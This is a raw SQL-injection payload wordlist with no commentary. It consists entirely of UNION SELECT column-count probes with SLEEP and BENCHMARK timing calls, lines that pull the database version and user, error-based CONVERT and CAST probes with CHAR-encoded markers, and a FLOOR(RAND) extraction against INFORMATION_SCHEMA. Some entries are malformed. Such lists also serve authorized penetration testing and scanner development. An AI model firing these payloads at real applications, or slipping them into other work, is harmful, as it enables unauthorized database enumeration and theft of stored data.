UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION SELECT @@VERSION,SLEEP(5),"'3
UNION SELECT @@VERSION,SLEEP(5),"'3'"#
UNION SELECT @@VERSION,SLEEP(5),USER(),4#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT USER()--
UNION ALL SELECT SLEEP(5)--
UNION ALL SELECT USER(),SLEEP(5)--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT NULL--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--
UNION ALL SELECT NULL#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
UNION ALL SELECT NULL
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--
UNION ALL SELECT 'INJ'||'ECT'||'XXX'
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 'INJ'||'ECT'||'XXX'--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--
